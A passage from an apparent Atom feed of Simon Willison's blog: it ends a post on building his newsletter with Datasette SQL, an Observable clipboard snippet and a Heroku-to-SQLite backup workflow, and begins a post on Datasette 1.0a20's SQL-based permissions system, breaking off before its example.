s+html%2C%0D%0A++++%27null%27+as+json%2C%0D%0A++++source_url+as+external_url%0D%0A++from+blog_quotation%0D%0A++union+all%0D%0A++select%0D%0A++++id%2C%0D%0A++++%27note%27+as+type%2C%0D%0A++++case%0D%0A++++++when+title+is+not+null+and+title+%3C%3E+%27%27+then+title%0D%0A++++++else+%27Note+on+%27+%7C%7C+date%28created%29%0D%0A++++end%2C%0D%0A++++created%2C%0D%0A++++slug%2C%0D%0A++++%27No+HTML%27%2C%0D%0A++++json_object%28%0D%0A++++++%27created%27%2C+date%28created%29%2C%0D%0A++++++%27link_url%27%2C+%27https%3A%2F%2Fsimonwillison.net%2F%27+%7C%7C+strftime%28%27%25Y%2F%27%2C+created%29%0D%0A++++++%7C%7C+substr%28%27JanFebMarAprMayJunJulAugSepOctNovDec%27%2C+%28strftime%28%27%25m%27%2C+created%29+-+1%29+*+3+%2B+1%2C+3%29+%0D%0A++++++%7C%7C+%27%2F%27+%7C%7C+cast%28strftime%28%27%25d%27%2C+created%29+as+integer%29+%7C%7C+%27%2F%27+%7C%7C+slug+%7C%7C+%27%2F%27%2C%0D%0A++++++%27link_title%27%2C+%27%27%2C%0D%0A++++++%27commentary%27%2C+body%2C%0D%0A++++++%27use_markdown%27%2C+1%0D%0A++++%29%2C%0D%0A++++%27%27+as+external_url%0D%0A++from+blog_note%0D%0A++union+all%0D%0A++select%0D%0A++++rowid%2C%0D%0A++++%27til%27+as+type%2C%0D%0A++++title%2C%0D%0A++++created%2C%0D%0A++++%27null%27+as+slug%2C%0D%0A++++%27%3Cp%3E%3Cstrong%3ETIL%3C%2Fstrong%3E+%27+%7C%7C+date%28created%29+%7C%7C+%27+%3Ca+href%3D%22%27%7C%7C+%27https%3A%2F%2Ftil.simonwillison.net%2F%27+%7C%7C+topic+%7C%7C+%27%2F%27+%7C%7C+slug+%7C%7C+%27%22%3E%27+%7C%7C+title+%7C%7C+%27%3C%2Fa%3E%3A%27+%7C%7C+%27+%27+%7C%7C+substr%28html%2C+1%2C+instr%28html%2C+%27%3C%2Fp%3E%27%29+-+1%29+%7C%7C+%27+%26%238230%3B%3C%2Fp%3E%27+as+html%2C%0D%0A++++%27null%27+as+json%2C%0D%0A++++%27https%3A%2F%2Ftil.simonwillison.net%2F%27+%7C%7C+topic+%7C%7C+%27%2F%27+%7C%7C+slug+as+external_url%0D%0A++from+til%0D%0A%29%2C%0D%0Acollected+as+%28%0D%0A++select%0D%0A++++id%2C%0D%0A++++type%2C%0D%0A++++title%2C%0D%0A++++case%0D%0A++++++when+type+%3D+%27til%27%0D%0A++++++then+external_url%0D%0A++++++else+%27https%3A%2F%2Fsimonwillison.net%2F%27+%7C%7C+strftime%28%27%25Y%2F%27%2C+created%29%0D%0A++++++%7C%7C+substr%28%27JanFebMarAprMayJunJulAugSepOctNovDec%27%2C+%28strftime%28%27%25m%27%2C+created%29+-+1%29+*+3+%2B+1%2C+3%29+%7C%7C+%0D%0A++++++%27%2F%27+%7C%7C+cast%28strftime%28%27%25d%27%2C+created%29+as+integer%29+%7C%7C+%27%2F%27+%7C%7C+slug+%7C%7C+%27%2F%27%0D%0A++++++end+as+url%2C%0D%0A++++created%2C%0D%0A++++html%2C%0D%0A++++json%2C%0D%0A++++external_url%2C%0D%0A++++case%0D%0A++++++when+type+%3D+%27entry%27+then+%28%0D%0A++++++++select+json_group_array%28tag%29%0D%0A++++++++from+blog_tag%0D%0A++++++++join+blog_entry_tags+on+blog_tag.id+%3D+blog_entry_tags.tag_id%0D%0A++++++++where+blog_entry_tags.entry_id+%3D+content.id%0D%0A++++++%29%0D%0A++++++when+type+%3D+%27blogmark%27+then+%28%0D%0A++++++++select+json_group_array%28tag%29%0D%0A++++++++from+blog_tag%0D%0A++++++++join+blog_blogmark_tags+on+blog_tag.id+%3D+blog_blogmark_tags.tag_id%0D%0A++++++++where+blog_blogmark_tags.blogmark_id+%3D+content.id%0D%0A++++++%29%0D%0A++++++when+type+%3D+%27quotation%27+then+%28%0D%0A++++++++select+json_group_array%28tag%29%0D%0A++++++++from+blog_tag%0D%0A++++++++join+blog_quotation_tags+on+blog_tag.id+%3D+blog_quotation_tags.tag_id%0D%0A++++++++where+blog_quotation_tags.quotation_id+%3D+content.id%0D%0A++++++%29%0D%0A++++++else+%27%5B%5D%27%0D%0A++++end+as+tags%0D%0A++from+content%0D%0A++where+created+%3E%3D+date%28%27now%27%2C+%27-%27+%7C%7C+%3Anumdays+%7C%7C+%27+days%27%29+++%0D%0A++order+by+created+desc%0D%0A%29%0D%0Aselect+id%2C+type%2C+title%2C+url%2C+created%2C+html%2C+json%2C+external_url%2C+tags%0D%0Afrom+collected+%0D%0Aorder+by+%0D%0A++case+type+%0D%0A++++when+%27entry%27+then+0+%0D%0A++++else+1+%0D%0A++end%2C%0D%0A++case+type+%0D%0A++++when+%27entry%27+then+created+%0D%0A++++else+-strftime%28%27%25s%27%2C+created%29+%0D%0A++end+desc%3B&amp;amp;numdays=7"&gt;see and execute that query&lt;/a&gt; directly in Datasette. It's 143 lines of convoluted SQL that assembles most of the HTML for the newsletter using SQLite string concatenation! An illustrative snippet:&lt;/p&gt;
&lt;div class="highlight highlight-source-sql"&gt;&lt;pre&gt;with content &lt;span class="pl-k"&gt;as&lt;/span&gt; (
  &lt;span class="pl-k"&gt;select&lt;/span&gt;
    id,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;entry&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;as&lt;/span&gt; type,
    title,
    created,
    slug,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;&amp;lt;h3&amp;gt;&amp;lt;a href="&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;||&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;https://simonwillison.net/&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;||&lt;/span&gt; strftime(&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;%Y/&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;, created)
      &lt;span class="pl-k"&gt;||&lt;/span&gt; substr(&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;JanFebMarAprMayJunJulAugSepOctNovDec&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;, (strftime(&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;%m&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;, created) &lt;span class="pl-k"&gt;-&lt;/span&gt; &lt;span class="pl-c1"&gt;1&lt;/span&gt;) &lt;span class="pl-k"&gt;*&lt;/span&gt; &lt;span class="pl-c1"&gt;3&lt;/span&gt; &lt;span class="pl-k"&gt;+&lt;/span&gt; &lt;span class="pl-c1"&gt;1&lt;/span&gt;, &lt;span class="pl-c1"&gt;3&lt;/span&gt;) 
      &lt;span class="pl-k"&gt;||&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;/&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;||&lt;/span&gt; cast(strftime(&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;%d&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;, created) &lt;span class="pl-k"&gt;as&lt;/span&gt; &lt;span class="pl-k"&gt;integer&lt;/span&gt;) &lt;span class="pl-k"&gt;||&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;/&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;||&lt;/span&gt; slug &lt;span class="pl-k"&gt;||&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;/&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;||&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;"&amp;gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; 
      &lt;span class="pl-k"&gt;||&lt;/span&gt; title &lt;span class="pl-k"&gt;||&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;&amp;lt;/a&amp;gt; - &lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;||&lt;/span&gt; &lt;span class="pl-k"&gt;date&lt;/span&gt;(created) &lt;span class="pl-k"&gt;||&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;&amp;lt;/h3&amp;gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;||&lt;/span&gt; body
      &lt;span class="pl-k"&gt;as&lt;/span&gt; html,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;null&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;as&lt;/span&gt; json,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;as&lt;/span&gt; external_url
  &lt;span class="pl-k"&gt;from&lt;/span&gt; blog_entry
  &lt;span class="pl-k"&gt;union all&lt;/span&gt;
  &lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt; ...&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;My blog's URLs look like &lt;code&gt;/2025/Nov/18/gemini-3/&lt;/code&gt; - this SQL constructs that three letter month abbreviation from the month number using a substring operation.&lt;/p&gt;
&lt;p&gt;This is a &lt;em&gt;terrible&lt;/em&gt; way to assemble HTML, but I've stuck with it because it amuses me.&lt;/p&gt;
&lt;p&gt;The rest of the Observable notebook takes that data, filters out anything that links to content mentioned in the previous newsletters and composes it into a block of HTML that can be copied using that big button.&lt;/p&gt;
&lt;p&gt;Here's the recipe it uses to turn HTML into rich text content on a clipboard suitable for Substack. I can't remember how I figured this out but it's very effective:&lt;/p&gt;
&lt;div class="highlight highlight-source-js"&gt;&lt;pre&gt;&lt;span class="pl-v"&gt;Object&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;assign&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;
  &lt;span class="pl-en"&gt;html&lt;/span&gt;&lt;span class="pl-s"&gt;`&lt;span class="pl-kos"&gt;&amp;lt;&lt;/span&gt;&lt;span class="pl-ent"&gt;button&lt;/span&gt; &lt;span class="pl-c1"&gt;style&lt;/span&gt;="&lt;span class="pl-s"&gt;font-size: 1.4em; padding: 0.3em 1em; font-weight: bold;&lt;/span&gt;"&lt;span class="pl-kos"&gt;&amp;gt;&lt;/span&gt;Copy rich text newsletter to clipboard`&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
  &lt;span class="pl-kos"&gt;{&lt;/span&gt;
    &lt;span class="pl-en"&gt;onclick&lt;/span&gt;: &lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt; &lt;span class="pl-c1"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="pl-kos"&gt;{&lt;/span&gt;
      &lt;span class="pl-k"&gt;const&lt;/span&gt; &lt;span class="pl-s1"&gt;htmlContent&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-s1"&gt;newsletterHTML&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
      &lt;span class="pl-c"&gt;// Create a temporary element to hold the HTML content&lt;/span&gt;
      &lt;span class="pl-k"&gt;const&lt;/span&gt; &lt;span class="pl-s1"&gt;tempElement&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-smi"&gt;document&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;createElement&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s"&gt;"div"&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
      &lt;span class="pl-s1"&gt;tempElement&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;innerHTML&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-s1"&gt;htmlContent&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
      &lt;span class="pl-smi"&gt;document&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;body&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;appendChild&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s1"&gt;tempElement&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
      &lt;span class="pl-c"&gt;// Select the HTML content&lt;/span&gt;
      &lt;span class="pl-k"&gt;const&lt;/span&gt; &lt;span class="pl-s1"&gt;range&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-smi"&gt;document&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;createRange&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
      &lt;span class="pl-s1"&gt;range&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;selectNode&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s1"&gt;tempElement&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
      &lt;span class="pl-c"&gt;// Copy the selected HTML content to the clipboard&lt;/span&gt;
      &lt;span class="pl-k"&gt;const&lt;/span&gt; &lt;span class="pl-s1"&gt;selection&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-smi"&gt;window&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;getSelection&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
      &lt;span class="pl-s1"&gt;selection&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;removeAllRanges&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
      &lt;span class="pl-s1"&gt;selection&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;addRange&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s1"&gt;range&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
      &lt;span class="pl-smi"&gt;document&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;execCommand&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s"&gt;"copy"&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
      &lt;span class="pl-s1"&gt;selection&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;removeAllRanges&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
      &lt;span class="pl-smi"&gt;document&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;body&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;removeChild&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s1"&gt;tempElement&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
    &lt;span class="pl-kos"&gt;}&lt;/span&gt;
  &lt;span class="pl-kos"&gt;}&lt;/span&gt;
&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h4 id="from-django-postgresql-to-datasette-sqlite"&gt;From Django+Postgresql to Datasette+SQLite&lt;/h4&gt;
&lt;p&gt;My blog itself is a Django application hosted on Heroku, with data stored in Heroku PostgreSQL. Here's &lt;a href="https://github.com/simonw/simonwillisonblog"&gt;the source code for that Django application&lt;/a&gt;. I use the Django admin as my CMS.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://datasette.io/"&gt;Datasette&lt;/a&gt; provides a JSON API over a SQLite database... which means something needs to convert that PostgreSQL database into a SQLite database that Datasette can use.&lt;/p&gt;
&lt;p&gt;My system for doing that lives in the &lt;a href="https://github.com/simonw/simonwillisonblog-backup"&gt;simonw/simonwillisonblog-backup&lt;/a&gt; GitHub repository. It uses GitHub Actions on a schedule that executes every two hours, fetching the latest data from PostgreSQL and converting that to SQLite.&lt;/p&gt;
&lt;p&gt;My &lt;a href="https://github.com/simonw/db-to-sqlite"&gt;db-to-sqlite&lt;/a&gt; tool is responsible for that conversion. I call it &lt;a href="https://github.com/simonw/simonwillisonblog-backup/blob/dc5b9df272134ce051a5280b4de6d4daa9b2a9fc/.github/workflows/backup.yml#L44-L62"&gt;like this&lt;/a&gt;:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;db-to-sqlite \
  &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;$(&lt;/span&gt;heroku config:get DATABASE_URL -a simonwillisonblog &lt;span class="pl-k"&gt;|&lt;/span&gt; sed s/postgres:/postgresql+psycopg2:/&lt;span class="pl-pds"&gt;)&lt;/span&gt;&lt;/span&gt; \
  simonwillisonblog.db \
  --table auth_permission \
  --table auth_user \
  --table blog_blogmark \
  --table blog_blogmark_tags \
  --table blog_entry \
  --table blog_entry_tags \
  --table blog_quotation \
  --table blog_quotation_tags \
  --table blog_note \
  --table blog_note_tags \
  --table blog_tag \
  --table blog_previoustagname \
  --table blog_series \
  --table django_content_type \
  --table redirects_redirect&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;That &lt;code&gt;heroku config:get DATABASE_URL&lt;/code&gt; command uses Heroku credentials in an environment variable to fetch the database connection URL for my blog's PostgreSQL database (and fixes a small difference in the URL scheme).&lt;/p&gt;
&lt;p&gt;&lt;code&gt;db-to-sqlite&lt;/code&gt; can then export that data and write it to a SQLite database file called &lt;code&gt;simonwillisonblog.db&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;--table&lt;/code&gt; options specify the tables that should be included in the export.&lt;/p&gt;
&lt;p&gt;The repository does more than just that conversion: it also exports the resulting data to JSON files that live in the repository, which gives me a &lt;a href="https://github.com/simonw/simonwillisonblog-backup/commits/main/simonwillisonblog"&gt;commit history&lt;/a&gt; of changes I make to my content. This is a cheap way to get a revision history of my blog content without having to mess around with detailed history tracking inside the Django application itself.&lt;/p&gt;
&lt;p&gt;At the &lt;a href="https://github.com/simonw/simonwillisonblog-backup/blob/dc5b9df272134ce051a5280b4de6d4daa9b2a9fc/.github/workflows/backup.yml#L200-L204"&gt;end of my GitHub Actions workflow&lt;/a&gt; is this code that publishes the resulting database to Datasette running on &lt;a href="https://fly.io/"&gt;Fly.io&lt;/a&gt; using the &lt;a href="https://datasette.io/plugins/datasette-publish-fly"&gt;datasette publish fly&lt;/a&gt; plugin:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;datasette publish fly simonwillisonblog.db \
  -m metadata.yml \
  --app simonwillisonblog-backup \
  --branch 1.0a2 \
  --extra-options &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;--setting sql_time_limit_ms 15000 --setting truncate_cells_html 10000 --setting allow_facet off&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; \
  --install datasette-block-robots \
  &lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt; ... more plugins&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;As you can see, there are a lot of moving parts! Surprisingly it all mostly just works - I rarely have to intervene in the process, and the cost of those different components is pleasantly low.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/blogging"&gt;blogging&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/django"&gt;django&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/javascript"&gt;javascript&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/postgresql"&gt;postgresql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/youtube"&gt;youtube&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/heroku"&gt;heroku&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/observable"&gt;observable&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/github-actions"&gt;github-actions&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/fly"&gt;fly&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/newsletter"&gt;newsletter&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/substack"&gt;substack&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/site-upgrades"&gt;site-upgrades&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="blogging"/><category term="django"/><category term="javascript"/><category term="postgresql"/><category term="sql"/><category term="sqlite"/><category term="youtube"/><category term="heroku"/><category term="datasette"/><category term="observable"/><category term="github-actions"/><category term="fly"/><category term="newsletter"/><category term="substack"/><category term="site-upgrades"/></entry><entry><title>A new SQL-powered permissions system in Datasette 1.0a20</title><link href="https://simonwillison.net/2025/Nov/4/datasette-10a20/#atom-tag" rel="alternate"/><published>2025-11-04T21:34:42+00:00</published><updated>2025-11-04T21:34:42+00:00</updated><id>https://simonwillison.net/2025/Nov/4/datasette-10a20/#atom-tag</id><summary type="html">
    &lt;p&gt;&lt;a href="https://docs.datasette.io/en/latest/changelog.html#a20-2025-11-03"&gt;Datasette 1.0a20 is out&lt;/a&gt; with the biggest breaking API change on the road to 1.0, improving how Datasette's permissions system works by migrating permission logic to SQL running in SQLite. This release involved &lt;a href="https://github.com/simonw/datasette/compare/1.0a19...1.0a20"&gt;163 commits&lt;/a&gt;, with 10,660 additions and 1,825 deletions, most of which was written with the help of Claude Code.&lt;/p&gt;


&lt;ul&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2025/Nov/4/datasette-10a20/#understanding-the-permissions-system"&gt;Understanding the permissions system&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2025/Nov/4/datasette-10a20/#permissions-systems-need-to-be-able-to-efficiently-list-things"&gt;Permissions systems need to be able to efficiently list things&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2025/Nov/4/datasette-10a20/#the-new-permission-resources-sql-plugin-hook"&gt;The new permission_resources_sql() plugin hook&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2025/Nov/4/datasette-10a20/#hierarchies-plugins-vetoes-and-restrictions"&gt;Hierarchies, plugins, vetoes, and restrictions&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2025/Nov/4/datasette-10a20/#new-debugging-tools"&gt;New debugging tools&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2025/Nov/4/datasette-10a20/#the-missing-feature-list-actors-who-can-act-on-this-resource"&gt;The missing feature: list actors who can act on this resource&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2025/Nov/4/datasette-10a20/#upgrading-plugins-for-datasette-1-0a20"&gt;Upgrading plugins for Datasette 1.0a20&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2025/Nov/4/datasette-10a20/#using-claude-code-to-implement-this-change"&gt;Using Claude Code to implement this change&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2025/Nov/4/datasette-10a20/#starting-with-a-proof-of-concept"&gt;Starting with a proof-of-concept&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2025/Nov/4/datasette-10a20/#miscellaneous-tips-i-picked-up-along-the-way"&gt;Miscellaneous tips I picked up along the way&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2025/Nov/4/datasette-10a20/#what-s-next-"&gt;What's next?&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h4 id="understanding-the-permissions-system"&gt;Understanding the permissions system&lt;/h4&gt;
&lt;p&gt;Datasette's &lt;a href="https://docs.datasette.io/en/latest/authentication.html"&gt;permissions system&lt;/a&gt; exists to answer the following question:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Is this &lt;strong&gt;actor&lt;/strong&gt; allowed to perform this &lt;strong&gt;action&lt;/strong&gt;, optionally against this particular &lt;strong&gt;resource&lt;/strong&gt;?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;An &lt;strong&gt;actor&lt;/strong&gt; is usually a user, but might also be an automation operating via the Datasette API.&lt;/p&gt;
&lt;p&gt;An &lt;strong&gt;action&lt;/strong&gt; is a thing they need to do - things like view-table, execute-sql, insert-row.&lt;/p&gt;
&lt;p&gt;A &lt;strong&gt;resource&lt;/strong&gt; is the subject of the action - the database you are executing SQL against, the table you want to insert a row into.&lt;/p&gt;
&lt;p&gt;Datasette's default configuration is public but read-only: anyone can view databases and tables or execute read-only SQL queries but no-one can modify data.&lt;/p&gt;
&lt;p&gt;Datasette plugins can enable all sorts of additional ways to interact with databases, many of which need to be protected by a form of authentication Datasette also 1.0 includes &lt;a href="https://simonwillison.net/2022/Dec/2/datasette-write-api/"&gt;a write API&lt;/a&gt; with a need to configure who can insert, update, and delete rows or create new tables.&lt;/p&gt;
&lt;p&gt;Actors can be authenticated in a number of different ways provided by plugins using the &lt;a href="https://docs.datasette.io/en/latest/plugin_hooks.html#actor-from-request-datasette-request"&gt;actor_from_request()&lt;/a&gt; plugin hook. &lt;a href="https://datasette.io/plugins/datasette-auth-passwords"&gt;datasette-auth-passwords&lt;/a&gt; and &lt;a href="https://datasette.io/plugins/datasette-auth-github"&gt;datasette-auth-github&lt;/a&gt; and &lt;a href="https://datasette.io/plugins/datasette-auth-existing-cookies"&gt;datasette-auth-existing-cookies&lt;/a&gt; are examples of authentication plugins.&lt;/p&gt;
&lt;h4 id="permissions-systems-need-to-be-able-to-efficiently-list-things"&gt;Permissions systems need to be able to efficiently list things&lt;/h4&gt;
&lt;p&gt;The previous implementation included a design flaw common to permissions systems of this nature: each permission check involved a function call which would delegate to one or more plugins and return a True/False result.&lt;/p&gt;
&lt;p&gt;This works well for single checks, but has a significant problem: what if you need to show the user a list of things they can access, for example the tables they can view?&lt;/p&gt;
&lt;p&gt;I want Datasette to be able to handle potentially thousands of tables - tables in SQLite are cheap! I don't want to have to run 1,000+ permission checks just to show the user a list of tables.&lt;/p&gt;
&lt;p&gt;Since Datasette is built on top of SQLite we already have a powerful mechanism to help solve this problem. SQLite is &lt;em&gt;really&lt;/em&gt; good at filtering large numbers of records.&lt;/p&gt;
&lt;h4 id="the-new-permission-resources-sql-plugin-hook"&gt;The new permission_resources_sql() plugin hook&lt;/h4&gt;
&lt;p&gt;The biggest change in the new release is that I've replaced the previous  &lt;code&gt;permission_allowed(actor, action, resource)&lt;/code&gt; plugin hook - which let a plugin determine if an actor could perform an action against a resource - with a new &lt;a href="https://docs.datasette.io/en/latest/plugin_hooks.html#plugin-hook-permission-resources-sql"&gt;permission_resources_sql(actor, action)&lt;/a&gt; plugin hook.&lt;/p&gt;
&lt;p&gt;Instead of returning a True/False result, this new hook returns a SQL query that returns rules helping determine the resources the current actor can execute the specified action against.&lt;/p&gt;
&lt;p&gt;Here's an example, lifted from the documentation:&lt;/p&gt;
